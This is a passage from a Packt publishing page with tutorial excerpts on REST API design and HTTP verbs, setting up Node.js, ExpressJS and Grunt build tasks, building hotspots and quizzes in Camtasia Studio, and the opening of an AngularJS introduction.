follows: http://foo.api.com/v1/library/books/isbn/12345678 A URI to represent a coffee order resource could be as follows: http://bar.api.com/v1/coffees/orders/1234 A user in a system can be represented like this: http://some.api.com/v1/user A URI to represent all the book orders for a user could be: http://bar.api.com/v1/user/5034/book/orders All the preceding samples show a clear readable pattern, which can be interpreted by the client. All these resources could have multiple representations. These resource examples shown here can be represented by JSON or XML and can be manipulated by HTTP methods: GET, PUT, POST, and DELETE. The following table summarizes HTTP Methods and descriptions for the actions taken on the resource with a simple example of a collection of books in a library. HTTP method Resource URI Description GET /library/books Gets a list of books GET /library/books/isbn/12345678 Gets a book identified by ISBN “12345678” POST /library/books Creates a new book order DELETE /library/books/isbn/12345678 Deletes a book identified by ISBN “12345678” PUT /library/books/isbn/12345678 Updates a specific book identified by ISBN “12345678’ PATCH /library/books/isbn/12345678 Can be used to do partial update for a book identified by ISBN “12345678” REST and statelessness REST is bound by the principle of statelessness. Each request from the client to the server must have all the details to understand the request. This helps to improve visibility, reliability and scalability for requests. Visibility is improved, as the system monitoring the requests does not have to look beyond one request to get details. Reliability is improved, as there is no check-pointing/resuming to be done in case of partial failures. Scalability is improved, as the number of requests that can be processed is increases as the server is not responsible for storing any state. Roy Fielding’s dissertation on the REST architectural style provides details on the statelessness of REST, check http://www.ics.uci.edu/~fielding/pubs/dissertation/rest_arch_style.htm With this initial introduction to basics of REST, we shall cover the different maturity levels and how REST falls in it in the following section. Richardson Maturity Model Richardson maturity model is a model, which is developed by Leonard Richardson. It talks about the basics of REST in terms of resources, verbs and hypermedia controls. The starting point for the maturity model is to use HTTP layer as the transport. Level 0 – Remote Procedure Invocation This level contains SOAP or XML-RPC sending data as POX (Plain Old XML). Only POST methods are used. This is the most primitive way of building SOA applications with a single method POST and using XML to communicate between services. Level 1 – REST resources This uses POST methods and instead of using a function and passing arguments uses the REST URIs. So it still uses only one HTTP method. It is better than Level 0 that it breaks a complex functionality into multiple resources with one method. Level 2 – more HTTP verbs This level uses other HTTP verbs like GET, HEAD, DELETE, PUT along with POST methods. Level 2 is the real use case of REST, which advocates using different verbs based on the HTTP request methods and the system can have multiple resources. Level 3 – HATEOAS Hypermedia as the Engine of Application State (HATEOAS) is the most mature level of Richardson’s model. The responses to the client requests, contains hypermedia controls, which can help the client decide what the next action they can take. Level 3 encourages easy discoverability and makes it easy for the responses to be self- explanatory. Safety and Idempotence This section discusses in details about what are safe and idempotent methods. Safe methods Safe methods are methods that do not change the state on the server. GET and HEAD are safe methods. For example GET /v1/coffees/orders/1234 is a safe method. Safe methods can be cached. PUT method is not safe as it will create or modify a resource on the server. POST method is not safe for the same reasons. DELETE method is not safe as it deletes a resource on the server. Idempotent methods An idempotent method is a method that will produce the same results irrespective of how many times it is called. For example GET method is idempotent, as multiple calls to the GET resource will always return the same response. PUT method is idempotent as calling PUT method multiple times will update the same resource and not change the outcome. POST is not idempotent and calling POST method multiple times can have different results and will result in creating new resources. DELETE is idempotent because once the resource is deleted it is gone and calling the method multiple times will not change the outcome. HTTP verbs and REST HTTP verbs inform the server what to do with the data sent as part of the URL GET GET is the simplest verb of HTTP, which enables to get access to a resource. Whenever the client clicks a URL in the browser it sends a GET request to the address specified by the URL. GET is safe and idempotent. GET requests are cached. Query parameters can be used in GET requests. For example a simple GET request is as follows: curl http://api.foo.com/v1/user/12345 POST POST is used to create a resource. POST requests are neither idempotent nor safe. Multiple invocations of the POST requests can create multiple resources. POST requests should invalidate a cache entry if exists. Query parameters with POST requests are not encouraged For example a POST request to create a user can be curl –X POST -d’{“name”:”John Doe”,“username”:”jdoe”, “phone”:”412-344-5644”} http://api.foo.com/v1/user PUT PUT is used to update a resource. PUT is idempotent but not safe. Multiple invocations of PUT requests should produce the same results by updating the resource. PUT requests should invalidate the cache entry if exists. For example a PUT request to update a user can be curl –X PUT -d’{ “phone”:”413-344-5644”} http://api.foo.com/v1/user DELETE DELETE is used to delete a resource. DELETE is idempotent but not safe. DELETE is idempotent because based on the RFC 2616 "the side effects of N > 0 requests is the same as for a single request". This means once the resource is deleted calling DELETE multiple times will get the same response. For example, a request to delete a user is as follows: curl –X DELETE http://foo.api.com/v1/user/1234 HEAD HEAD is similar like GET request. The difference is that only HTTP headers are returned and no content is returned. HEAD is idempotent and safe. For example, a request to send HEAD request with curl is as follows: curl –X HEAD http://foo.api.com/v1/user It can be useful to send a HEAD request to see if the resource has changed before trying to get a large representation using a GET request. PUT vs POST According to RFC the difference between PUT and POST is in the Request URI. The URI identified by POST defines the entity that will handle the POST request. The URI in the PUT request includes the entity in the request. So POST /v1/coffees/orders means to create a new resource and return an identifier to describe the resource In contrast PUT /v1/coffees/orders/1234 means to update a resource identified by “1234” if it does not exist else create a new order and use the URI orders/1234 to identify it. Best practices when designing resources This section highlights some of the best practices when designing RESTful resources: The API developer should use nouns to understand and navigate through resources and verbs with the HTTP method. For example the URI /user/1234/books is better than /user/1234/getBook. Use associations in the URIs to identify sub resources. For example to get the authors for book 5678 for user 1234 use the following URI /user/1234/books/5678/authors. For specific variations use query parameters. For example to get all the books with 10 reviews /user/1234/books?reviews_counts=10. Allow partial responses as part of query parameters if possible. An example of this case is to get only the name and age of a user, the client can specify, ?fields as a query parameter and specify the list of fields which should be sent by the server in the response using the URI /users/1234?fields=name,age. Have defaults for the output format for the response incase the client does not specify which format it is interested in. Most API developers choose to send json as the default response mime type. Have camelCase or use _ for attribute names. Support a standard API for count for example users/1234/books/count in case of collections so the client can get the idea of how many objects can be expected in the response. This will also help the client, with pagination queries. Support a pretty printing option users/1234?pretty_print. Also it is a good practice to not cache queries with pretty print query parameter. Avoid chattiness by being as verbose as possible in the response. This is because if the server does not provide enough details in the response the client needs to make more calls to get additional details. That is a waste of network resources as well as counts against the client’s rate limits. REST architecture components This section will cover the various components that must be considered when building RESTful APIs As seen in the preceding screenshot, REST services can be consumed from a variety of clients and applications running on different platforms and devices like mobile devices, web browsers etc. These requests are sent through a proxy server. The HTTP requests will be sent to the resources and based on the various CRUD operations the right HTTP method will be selected. On the response side there can be Pagination, to ensure the server sends a subset of results. Also the server can do Asynchronous processing thus improving responsiveness and scale. There can be links in the response, which deals with HATEOAS. Here is a summary of the various REST architectural components: HTTP requests use REST API with HTTP verbs for the uniform interface constraint Content negotiation allows selecting a representation for a response when there are multiple representations available. Logging helps provide traceability to analyze and debug issues Exception handling allows sending application specific exceptions with HTTP codes Authentication and authorization with OAuth2.0 gives access control to other applications, to take actions without the user having to send their credentials Validation provides support to send back detailed messages with error codes to the client as well as validations for the inputs received in the request. Rate limiting ensures the server is not burdened with too many requests from single client Caching helps to improve application responsiveness. Asynchronous processing enables the server to asynchronously send back the responses to the client. Micro services which comprises breaking up a monolithic service into fine grained services HATEOAS to improve usability, understandability and navigability by returning a list of links in the response Pagination to allow clients to specify items in a dataset that they are interested in. The REST Architectural components in the image can be chained one after the other as shown priorly. For example, there can be a filter chain, consisting of filters related with Authentication, Rate limiting, Caching, and Logging. This will take care of authenticating the user, checking if the requests from the client are within rate limits, then a caching filter which can check if the request can be served from the cache respectively. This can be followed by a logging filter, which can log the details of the request. For more details, check RESTful Patterns and best practices.
Read more
  • 0
  • 0
  • 2006

article-image-setting-rig
Packt
21 Aug 2014
16 min read
Save for later

Setting Up The Rig

Packt
21 Aug 2014
16 min read
In this article by Vinci Rufus, the author of the book AngularJS Web Application Development Blueprints, we will see the process of setting up various tools required to start building AngularJS apps. I'm sure you would have heard the saying, "A tool man is known by the tools he keeps." OK fine, I just made that up, but that's actually true, especially when it comes to programming. Sure you can build complete and fully functional AngularJS apps just using a simple text editor and a browser, but if you want to work like a ninja, then make sure that you start using some of these tools as a part of your development workflow. Do note that these tools are not mandatory to build AngularJS apps. Their use is recommended mainly to help improve the productivity. In this article, we will see how to set up and use the following productivity tools: Node.js Grunt Yeoman Karma Protractor Since most of us are running a Mac, Windows, Ubuntu, or another flavor of the Linux operating system, we'll be covering the deployment steps common for all of them. (For more resources related to this topic, see here.) Setting up Node.js Depending on your technology stack, I strongly recommend you have either Ruby or Node.js installed. In case of AngularJS, most of the productivity tools or plugins are available as Node Package Manager (npm), and, hence, we will be setting up Node.js along with npm. Node.js is an open source JavaScript-based platform that uses an event-based Input/output model, making it lightweight and fast. Let us head over to www.nodejs.org and install Node.js. Choose the right version as per your operating system. The current version of Node.js at the time of writing this article is v0.10.x which comes with npm built in, making it a breeze to set up Node.js and npm. Node.js doesn't come with a Graphical User Interface (GUI), so to use Node.js, you will need to open up your terminal and start firing some commands. Now would also be a good time to brush up on your DOS and Unix/Linux commands. After installing Node.js, the first thing you'd want to check is to see if Node.js has been installed correctly. So, let us open up the terminal and write the following command: node –-version This should output the version number of Node.js that's installed on your system. The next would be to see what version of npm we have installed. The command for that would be as follows: npm –-version This will tell you the version number for your npm. Creating a simple Node.js web server with ExpressJS For basic, simple AngularJS apps, you don't really need a web server. You can simply open the HTML files from your filesystem and they would work just fine. However, as you start building complex applications where you are passing data in JSON, web services, or using a Content Delivery Network (CDN), you would find the need to use a web server. The good thing about AngularJS apps is that they could work within any web server, so if you already have IIS, Apache, Nginx, or any other web server running on your development environment, you can simply run your AngularJS project from within the web root folder. In case you don't have a web server and are looking for a lightweight web server, then let us set one up using Node.js and ExpressJS. One could write the entire web server in pure Node.js; however, ExpressJS provides a nice layer of abstraction on top of Node.js so that you can just work with the ExpressJS APIs and don't have to worry about the low-level calls. So, let's first install the ExpressJS module for Node.js. Open up your terminal and fire the following command: npm install -g express-generator This will globally install ExpressJS. Omit the –g to install ExpressJS locally in the current folder. When installing ExpressJS globally on Linux or Mac, you will need to run it via sudo as follows: sudo npm install –g express-generator This will let npm have the necessary permissions to write to the protected local folder under the user. The next step is to create an ExpressJS app; let us call it my-server. Type the following command in the terminal and hit enter: express my-server You'll see something like this: create : my-server create : my-server/package.json create : my-server/app.js create : my-server/public create : my-server/public/javascripts create : my-server/public/images create : my-server/public/stylesheets create : my-server/public/stylesheets/style.css create : my-server/routes create : my-server/routes/index.js create : my-server/routes/user.js create : my-server/views create : my-server/views/layout.jade create : my-server/views/index.jade install dependencies: $ cd my-server && npm install run the app: $ DEBUG=my-server ./bin/www This will create a folder called my-server and put in a bunch of files inside the folder. The package.json file is created, which contains the skeleton of your app. Open it and ensure the name says my-server; also, note the dependencies listed. Now, to install ExpressJS along with the dependencies, first change into the my-server directory and run the following command in the terminal: cd my-server npm install Now, in the terminal, type in the following command: npm start Open your browser and type http://localhost:3000 in the address bar. You'll get a nice ExpressJS welcome message. Now to test our Address Book App, we will copy our index.html, scripts.js, and styles.css into the public folder located within my-server. I'm not copying the angular.js file because we'll use the CDN version of the AngularJS library. Open up the index.html file and replace the following code: <script src= "angular.min.js" type="text/javascript"> </script> With the CDN version of AngularJS as follows: <script src="//ajax.googleapis.com/ajax/libs/angularjs/1.2.17/angular.min.js"></script> A question might arise, as to what if the CDN is unreachable. In such cases, we can add a fall back to use a local version of the AngularJS library. We do this by adding the following script after the CDN link is called: <script>window.angular || document.write('<script src="lib/angular/angular.min.js"></script>');</script> Save the file in the browser and enter localhost:3000/index.html. Your Address Book app is now running from a server and taking advantage of Google's CDN to serve the AngularJS file. Referencing the files using only // is also called the protocol independent absolute path. This means that the files are requested using the same protocol that is being used to call the parent page. For example, if the page you are loading is via https://, then the CDN link will also be called via HTTPS. This also means that when using // instead of http:// during development, you will need to run your app from within a server instead of a filesystem. Setting up Grunt Grunt is a JavaScript-based task runner. It is primarily used for automating tasks such as running unit tests, concatenating, merging, and minifying JS and CSS files. You can also run shell commands. This makes it super easy to perform server cleanups and deploy code. Essentially, Grunt is to JavaScript what Rake would be to Ruby or Ant/Maven would be to Java. Installing Grunt-cli Installing Grunt-cli is slightly different from installing other Node.js modules. We first need to install the Grunt's Command Line Interface (CLI) by firing the following command in the terminal: npm install -g grunt-cli Mac or Linux users can also directly run the following command: sudo npm install –g grunt-cli Make sure you have administrative privileges. Use sudo if you are on a Mac or Linux system. If you are on Windows, right-click and open the command prompt with administrative rights. An important thing to note is that installing Grunt-cli doesn't automatically install Grunt and its dependencies. Grunt-cli merely invokes the version of Grunt installed along with the Grunt file. While this may seem a little complicated at start, the reason it works this way is so that we can run different versions of Grunt from the same machine. This comes in handy when your project has dependencies on a specific version of Grunt. Creating the package.json file To install Grunt first, let's create a folder called my-project and create a file called package.json with the following content: { "name": "My-Project", "version": "0.1.0", "devDependencies": { "grunt": "~0.4.5", "grunt-contrib-jshint": "~0.10.0", "grunt-contrib-concat": "~0.4.0", "grunt-contrib-uglify": "~0.5.0", "grunt-shell": "~0.7.0" } } Save the file. The package.json is where you define the various parameters of your app; for example, the name of your app, the version number, and the list of dependencies needed for the app. Here we are calling our app My-Project with Version 0.1.0, and listing out the following dependencies that need to be installed as a part of this app: grunt (v0.4.5): This is the main Grunt application grunt-contrib-jshint (v0.10.0): This is used for code analysis grunt-contrib-concat (v0.4.0): This is used to merge two or more files into one grunt-contrib-uglify (v0.5.0): This is used to minify the JS file grunt-shell (v0.7.0): This is the Grunt shell used for running shell commands Visit http://gruntjs.com/plugins to get a list of all the plugins available for Grunt and also their exact names and version numbers. You may also choose to create a default package.json file by running the following command and answering the questions: npm init Open the package.json file and add the dependencies as mentioned earlier. Now that we have the package.json file, load the terminal and navigate into the my-project folder. To install Grunt and the modules specified in the file, type in the following command: npm install --save-dev You'll see a series of lines getting printed in the console, let that continue for a while and wait until it returns to the command prompt. Ensure that the last line printed by the previous command ends with OK code 0. Once Grunt is installed, a quick version check command will ensure that Grunt is installed. The command is as follows: grunt –-version There is a possibility that you got a bunch of errors and it ended with a not ok code 0 message. There could be multiple reasons why that would have happened, ranging from errors in your code to a network connection issue or something changing at Grunt's end due to a new version update. If grunt --version throws up an error, it means Grunt wasn't installed properly. To reinstall Grunt, enter the following commands in the terminal: rm –rf node_modules npm cache clean npm install Windows users may manually delete the node_modules folder from Windows Explorer, before running the cache clean command in the command prompt. Refer to http://www.gruntjs.com to troubleshoot the problem. Creating your Grunt tasks To run our Grunt tasks, we'll need a JavaScript file. So, let's copy our scritps.js file and place it into the my-projects folder. The next step is to create a Grunt file that will list out the tasks that we need Grunt to perform. For now, we will ask it to do four simple tasks, first check if our JS code is clean using JSHint, then we will merge three JS files into one and then minify the JS file, and finally we will run some shell commands to clean up. Until Version 0.3, the init command was a part of the Grunt tool and one could create a blank project using grunt-init. With Version 0.4, init is now available as a separate tool called grunt-init and needs to be installed using the npm install –g grunt-init command line. Also note that the structure of the grunt.js file from Version 0.4 onwards is fairly different from the earlier versions you've used. For now, we will resort to creating the Grunt file manually. Refer to the following screenshot: In the same location as where you have your package.json, create a file called gruntfile.js as shown earlier and type in the following code: module.exports = function(grunt) { // Project configuration. grunt.initConfig({ jshint:{ all:['scripts.js'] } }); grunt.loadNpmTasks('grunt-contrib-jshint'); // Default task. grunt.registerTask('default', ['jshint']); }; To start, we will add only one task which is jshint and specify scripts.js in the list of files that need to be linted. In the next line, we specify grunt-contrib-jshint as the npm task that needs to be loaded. In the last line, we define the jshint as the task to be run when Grunt is running in default mode. Save the file and in the terminal run the following command: grunt You would probably get to see the following message in the terminal: So JSHint is saying that we are missing a semicolon on lines 18 and 24. Oh! Did I mention that JSHint is like your very strict math teacher from high school. Let's open up scripts.js and put in those semicolons and rerun Grunt. Now you should get a message in green saying 1 file lint free. Done without errors. Let's add some more tasks to Grunt. We'll now ask it to concatenate and minify a couple of JS files. Since we currently have just one file, let's go and create two dummy JS files called scripts1.js and scripts2.js. In scripts1.js we'll simply write an empty function as follows: // This is from script 1 function Script1Function(){ //------// } Similarly, in scripts2.js we'll write the following: // This is from script 2 function Script2Function(){ //------// } Save these files in the same folder where you have scripts.js. Grunt tasks to merge and concatenate files Now, let's open our Grunt file and add the code for both the tasks—to merge the JS file, and minify them as follows: module.exports = function(grunt) { // Project configuration. grunt.initConfig({ jshint:{ all:['scripts.js'] }, concat: { dist: { src: ['scripts.js', 'scripts1.js','scripts2.js'], dest: 'merged.js' } }, uglify: { dist: { src: 'merged.js', dest: 'build/merged.min.js' } } }); grunt.loadNpmTasks('grunt-contrib-jshint'); grunt.loadNpmTasks('grunt-contrib-concat'); grunt.loadNpmTasks('grunt-contrib-uglify'); // Default task. grunt.registerTask('default', ['jshint','concat','uglify']); }; As you can see from the preceding code, after the jshint task, we added the concat task. Under the src attribute, we define the files separated by a comma that need to be concatenated. And in the dest attribute, we specify the name of the merged JS file. It is very important that the files are entered in the same sequence as they need to be merged. If the sequence of the files entered is incorrect, the merged JS file will cause errors in your app. The uglify task is used to minify the JS file and the structure is very similar to the concat task. We add the merged.js file to the src attribute and in the dest attribute, we will place the merged.min.js file into a folder called build. Grunt will auto create the build folder. After defining the tasks, we will load the necessary plugins, namely the grunt-contrib-concat and the grunt-contrib-uglify, and finally we will register the concat and uglify tasks to the default task. Save the file and run Grunt. And if all goes well, you should see Grunt running these tasks and informing the status of each of the tasks. If you get the final message saying, Done, without any errors, it means things went well, and this was your lucky day! If you now open your my-project folder in the file manager, you should see a new file called merged.js. Open it in the text editor and you'll notice that all the three files have been merged into this. Also, go into the build/merged.min.js file and verify whether the file is minified. Running shell commands via Grunt Another really helpful plugin in Grunt is grunt-shell. This allows us to effectively run clean-up activities such as deleting .tmp files and moving files from one folder to another. Let's see how to add the shell tasks to our Grunt file. Add the following highlighted piece of code to your Grunt file: module.exports = function(grunt) { // Project configuration. grunt.initConfig({ jshint:{ all:['scripts.js'] }, concat: { dist: { src: ['scripts.js', 'scripts1.js','scripts2.js'], dest: 'merged.js' } }, uglify: { dist: { src: 'merged.js', dest: 'build/merged.min.js' } } , shell: { multiple: { command: [ 'rm -rf merged.js', 'mkdir deploy', 'mv build/merged.min.js deploy/merged.min.js' ].join('&&') } } }); grunt.loadNpmTasks('grunt-contrib-jshint'); grunt.loadNpmTasks('grunt-contrib-concat'); grunt.loadNpmTasks('grunt-contrib-uglify'); grunt.loadNpmTasks('grunt-shell'); // Default task. grunt.registerTask('default', ['jshint','concat','uglify', 'shell' ]); }; As you can see from the code we added, we are first deleting the merged.js file, then creating a new folder called deploy and moving our merged.min.js file into it. Windows users would need to use the appropriate DOS commands for deleting and copying the files. Note that .join('&&') is used when you want Grunt to run multiple shell commands. The next steps are to load the npm tasks and add shell to the default task list. To see Grunt perform all these tasks, run the Grunt command in the terminal. Once it's done, open up the filesystem and verify whether Grunt has done what you had asked it to do. Just like we used the preceding four plugins, there are numerous other plugins that you can use with Grunt to automate your tasks. A point to note is while the default Grunt command will run all the tasks mentioned in the grunt.registerTask statement, if you would need to run a specific task instead of all of them, then you can simply type the following in the command line: grunt jshint Alternatively, you can type the following command: grunt concat Alternatively, you can type the following command: grunt ugligy At times if you'd like to run just two of the three tasks, then you can register them separately as another bundled task in the Grunt file. Open up the gruntfile.js file, and just after the line where you have registered the default task, add the following code: grunt.registerTask('concat-min', ['concat','uglify']); This will register a new task called concat-min and will run only the concat and uglify tasks. In the terminal run the following command: grunt concat-min Verify whether Grunt only concatenated and minified the file and didn't run JSHint or your shell commands. You can run grunt --help to see a list of all the tasks available in your Grunt file.
Read more
  • 0
  • 0
  • 1509

article-image-quizzes-and-interactions-camtasia-studio
Packt
21 Aug 2014
12 min read
Save for later

Quizzes and Interactions in Camtasia Studio

Packt
21 Aug 2014
12 min read
This article by David B. Demyan, the author of the book eLearning with Camtasia Studio, covers the different types of interactions, description of how interactions are created and how they function, and the quiz feature. In this article, we will cover the following topics specific topics: The types of interactions available in Camtasia Studio Video player requirements Creating simple action hotspots Using the quiz feature (For more resources related to this topic, see here.) Why include learner interactions? Interactions in e-learning support cognitive learning, the application of behavioral psychology to teaching. Students learn a lot when they perform an action based on the information they are presented. Without exhausting the volumes written about this subject, your own background has probably prepared you for creating effective materials that support cognitive learning. To boil it down for our purposes, you present information in chunks and ask learners to demonstrate whether they have received the signal. In the classroom, this is immortalized as a teacher presenting a lecture and asking questions, a basic educational model. In another scenario, it might be an instructor showing a student how to perform a mechanical task and then asking the student to repeat the same task. We know from experience that learners struggle with concepts if you present too much information too rapidly without checking to see if they understand it. In e-learning, the most effective ways to prevent confusion involve chunking information into small, digestible bites and mapping them into an overall program that allows the learner to progress in a logical fashion, all the while interacting and demonstrating comprehension. Interaction is vital to keep your students awake and aware. Interaction, or two-way communication, can take your e-learning video to the next level: a true cognitive learning experience. Interaction types While Camtasia Studio does not pretend to be a full-featured interactive authoring tool, it does contain some features that allow you to build interactions and quizzes. This section defines those features that support learners to take action while viewing an e-learning video when you request them for an interaction. There are three types of interactions available in Camtasia Studio: Simple action hotspots Branching hotspots Quizzes You are probably thinking of ways these techniques can help support cognitive learning. Simple action hotspots Hotspots are click areas. You indicate where the hotspot is using a visual cue, such as a callout. Camtasia allows you to designate the area covered by the callout as a hotspot and define the action to take when it is clicked. An example is to take the learner to another time in the video when the hotspot is clicked. Another click could take the learner back to the original place in the video. Quizzes Quizzes are simple questions you can insert in the video, created and implemented to conform to your testing strategy. The question types available are as follows: Multiple choice Fill in the blanks Short answers True/false Video player requirements Before we learn how to create interactions in Camtasia Studio, you should know some special video player requirements. A simple video file playing on a computer cannot be interactive by itself. A video created and produced in Camtasia Studio without including some additional program elements cannot react when you click on it except for what the video player tells it to do. For example, the default player for YouTube videos stops and starts the video when you click anywhere in the video space. Click interactions in videos created with Camtasia are able to recognize where clicks occur and the actions to take. You provide the click instructions when you set up the interaction. These instructions are required, for example, to intercept the clicking action, determine where exactly the click occurred, and link that spot with a command and destination. These click instructions may be any combination of HyperText Markup Language (HTML), HTML5, JavaScript, and Flash ActionScript. Camtasia takes care of creating the coding behind the scenes, associated with the video player being used. In the case of videos produced with Camtasia Studio, to implement any form of interactivity, you need to select the default Smart Player output options when producing the video. Creating simple hotspots The most basic interaction is clicking a hotspot layered over the video. You can create an interactive hotspot for many purposes, including the following: Taking learners to a specific marker or frame within the video, as determined on the timeline Allowing learners to replay a section of the video Directing learners to a website or document to view reference material Showing a pop up with additional information, such as a phone number or web link Try it – creating a hotspot If you are building the exercise project featured in this book, let's use it to create an interactive hotspot. The task in this exercise is to pause the video and add a Replay button to allow viewers to review a task. After the replay, a prompt will be added to resume the video from where it was paused. Inserting the Replay/Continue buttons The first step is to insert a Replay button to allow viewers to review what they just saw or continue without reviewing. This involves adding two hotspot buttons on the timeline, which can be done by performing the following steps: Open your exercise project in Camtasia Studio or one of your own projects where you can practice. Position the play head right after the part where text is shown being pasted into the CuePrompter window. From the Properties area, select Callouts from the task tabs above the timeline. In the Shape area, select Filled Rounded Rectangle (at the upper-right corner of the drop-down selection). A shape is added to the timeline. Set the Fade in and Fade out durations to about half a second. Select the Effects dropdown and choose Style. Choose the 3D Edge style. It looks like a raised button. Set any other formatting so the button looks the way you want in the preview window. In the Text area, type your button text. For the sample project, enter Replay Copy & Paste. Select the button in the preview window and make a copy of the button. You can use Ctrl + C to copy and Ctrl + V to paste the button. In the second copy of the button, select the text and retype it as Continue. It should be stacked on the timeline as shown in the following screenshot: Select the Continue button in the preview window and drag it to the right-hand side, at the same height and distance from the edge. The final placement of the buttons is shown in the sample project. Save the project. Adding a hotspot to the Continue button The buttons are currently inactive images on the timeline. Viewers could click them in the produced video, but nothing would happen. To make them active, enable the Hotspot properties for each button. To add a hotspot to the Continue button, perform the following steps: With the Continue button selected, select the Make hotspot checkbox in the Callouts panel. Click on the Hotspot Properties... button to set properties for the callout button. Under Actions, make sure to select Click to continue. Click on OK. The Continue button now has an active hotspot assigned to it. When published, the video will pause when the button appears. When the viewer clicks on Continue, the video will resume playing. You can test the video and the operation of the interactive buttons as described later in this article. Adding a hotspot to the Replay button Now, let's move on to create an action for the Replay copy & paste button: Select the Replay copy & paste button in the preview window. Select the Make hotspot checkbox in the Callouts panel. Click on the Hotspot properties... button. Under Actions, select Go to frame at time. Enter the time code for the spot on the timeline where you want to start the replay. In the sample video, this is around 0:01:43;00, just before text is copied in the script. Click on OK. Save the project. The Replay copy & paste button now has an active hotspot assigned to it. Later, when published, the video will pause when the button appears. When viewers click on Replay copy & paste, the video will be repositioned at the time you entered and begin playing from there. Using the quiz feature A quiz added to a video sets it apart. The addition of knowledge checks and quizzes to assess your learners' understanding of the material presented puts the video into the true e-learning category. By definition, a knowledge check is a way for the student to check their understanding without worrying about scoring. Typically, feedback is given to the student for them to better understand the material, the question, and their answer. The feedback can be terse, such as correct and incorrect, or it can be verbose, informing if the answer is correct or not and perhaps giving additional information, a hint, or even the correct answers, depending on your strategy in creating the knowledge check. A quiz can be in the same form as a knowledge check but a record of the student's answer is created and reported to an LMS or via an e-mail report. Feedback to the student is optional, again depending on your testing strategy. In Camtasia Studio, you can insert a quiz question or set of questions anywhere on the timeline you deem appropriate. This is done with the Quizzing task tab. Try it – inserting a quiz In this exercise, you will select a spot on the timeline to insert a quiz, enable the Quizzing feature, and write some appropriate questions following the sample project, Using CuePrompter. Creating a quiz Place your quiz after you have covered a block of information. The sample project, Using CuePrompter, is a very short task-based tutorial, showing some basic steps. Assume for now that you are teaching a course on CuePrompter and need to assess students' knowledge. I believe a good place for a quiz is after the commands to scroll forward, speed up, slow down, and scroll reverse. Let's give it a try with multiple choice and true/false questions: Position the play head at the appropriate part of the timeline. In the sample video, the end of the scrolling command description is at about 3 minutes 12 seconds. Select Quizzing in the task tabs. If you do not see the Quizzing tab above the timeline, select the More tab to reveal it. Click on the Add quiz button to begin adding questions. A marker appears on the timeline where your quiz will appear during the video, as illustrated in the following screenshot: In the Quiz panel, add a quiz name. In the sample project, the quiz is entitled CuePrompter Commands. Scroll down to Question type. Make sure Multiple Choice is selected from the dropdown. In the Question box, type the question text. In the sample project, the first question is With text in the prompter ready to go, the keyboard control to start scrolling forward is _________________. In the Answers box, double-click on the checkbox text that says Default Answer Text. Retype the answer Control-F. In the next checkbox text that says <Type an answer choice here>, double-click on it and add the second possible answer, Spacebar. Check the box next to it to indicate that it is the correct answer. Add two more choices: Alt-Insert and Tab. Your Quiz panel should look like the following screenshot: Click on Add question. From the Question type dropdown, select True/False. In the Question box, type You can stop CuePrompter with the End key. In Answers, select False. For the final question, click on Add question again. From the Question type dropdown, select Multiple Choice. In the Question box, type Which keyboard command tells CuePrompter to reverse?. Enter the four possible answers: Left arrow Right arrow Down arrow Up arrow Select Down arrow as the correct answer. Save the project. Now you have entered three questions and answer choices, while indicating the choice that will be scored correct if selected. Next, preview the quiz to check format and function. Previewing the quiz Camtasia Studio allows you to preview quizzes for correct formatting, wording, and scoring. Continue to follow along in the exercise project and perform the following steps: Leave checkmarks in the Score quiz and Viewer can see answers after submitting boxes. Click on the Preview button. A web page opens in your Internet browser showing the questions, as shown in the following screenshot: Select an answer and click on Next. The second quiz question is displayed. Select an answer and click on Next. The third quiz question is displayed. Select an answer and click on Submit Answers. As this is the final question, there is no Next. Since we left the Score quiz and Viewer can see answers after submitting options selected, the learner receives a prompt, as shown in the following screenshot: Click on View Answers to review the answers you gave. Correct responses are shown with a green checkmark and incorrect ones are shown with a red X mark. If you do not want your learners to see the answers, remove the checkmark from Viewer can see answers after submitting. Exit the browser to discontinue previewing the quiz. Save the project. This completes the Try it exercise for inserting and previewing a quiz in your video e-learning project. Summary In this article, we learned different types of interactions, video player requirements, creating simple action hotspots, and inserting and previewing a quiz. Resources for Article: Further resources on this subject: Introduction to Moodle [article] Installing Drupal [article] Make Spacecraft Fly and Shoot with Special Effects using Blender 3D 2.49 [article]
Read more
  • 0
  • 0
  • 3183
article-image-angularjs-0
Packt
20 Aug 2014
15 min read
Save for later

AngularJS

Packt
20 Aug 2014
15 min read
In this article, by Rodrigo Branas, author of the book, AngularJS Essentials, we will go through the basics of AngularJS. Created by Miško Hevery and Adam Abrons in 2009, AngularJS is an open source, client-side JavaScript framework that promotes a high productivity web development experience. It was built over the belief that declarative programming is the best choice to construct the user's interface, while imperative programming is much better and preferred to implement the application's business logic. To achieve that, AngularJS empowers the traditional HTML by extending its current vocabulary, making the life of developers easier. The result is the development of expressive, reusable, and maintainable application components, leaving behind a lot of unnecessary code and keeping the team focused on the valuable and important things. (For more resources related to this topic, see here.) Architectural concepts It's been a long time since the famous Model-View-Controller, also known as MVC, started to be widely used in the software development industry, thereby becoming one of the legends of the enterprise architecture design. Basically, the model represents the knowledge that the view is responsible to present, while the controller mediates their relationship. However, these concepts are a little bit abstract, and this pattern may have different implementations depending on the language, platform, and purposes of the application. After a lot of discussions about which architectural pattern the framework follows, its authors declared that from now on, AngularJS is adopting Model-View-Whatever (MVW). Regardless of the name, the most important benefit is that the framework provides a clear separation of the concerns between the application layers, providing modularity, flexibility, and testability. In terms of concepts, a typical AngularJS application consists primarily of view, model, and controller, but there are other important components, such as services, directives, and filters. The view, also called template, is entirely written in HTML, which becomes a great opportunity to see web designers and JavaScript developers working side-by-side. It also takes advantage of the directives mechanism, a kind of extension of the HTML vocabulary that brings the ability to perform the programming language tasks, such as iterating over an array or even evaluating an expression conditionally. Behind the view, there is the controller. At first, the controller contains all business logic implementation used by the view. However, as the application grows, it becomes really important to perform some refactoring activities, such as moving the code from the controller to other components like services, in order to keep the cohesion high. The connection between the view and the controller is done by a shared object called scope. It is located between them and is used to exchange information related to the model. The model is a simple Plain-Old-JavaScript-Object (POJO). It looks very clear and easy to understand, bringing simplicity to the development by not requiring any special syntax to be created. Setting up the framework The configuration process is very simple and in order to set up the framework, we start by importing the angular.js script to our HTML file. After that, we need to create the application module by calling the module function, from the Angular's API, with it's name and dependencies. With the module already created, we just need to place the ng-app attribute with the module's name inside the html element or any other that surrounds the application. This attribute is important because it supports the initialization process of the framework. In the following code, there is an introductory application about a parking lot. At first, we are able to add and also list the parked cars, storing it’s plate in memory. Throughout the book, we will evolve this parking control application by incorporating each newly studied concept. index.html <!doctype html> <!-- Declaring the ng-app --> <html ng-app="parking"> <head> <title>Parking</title> 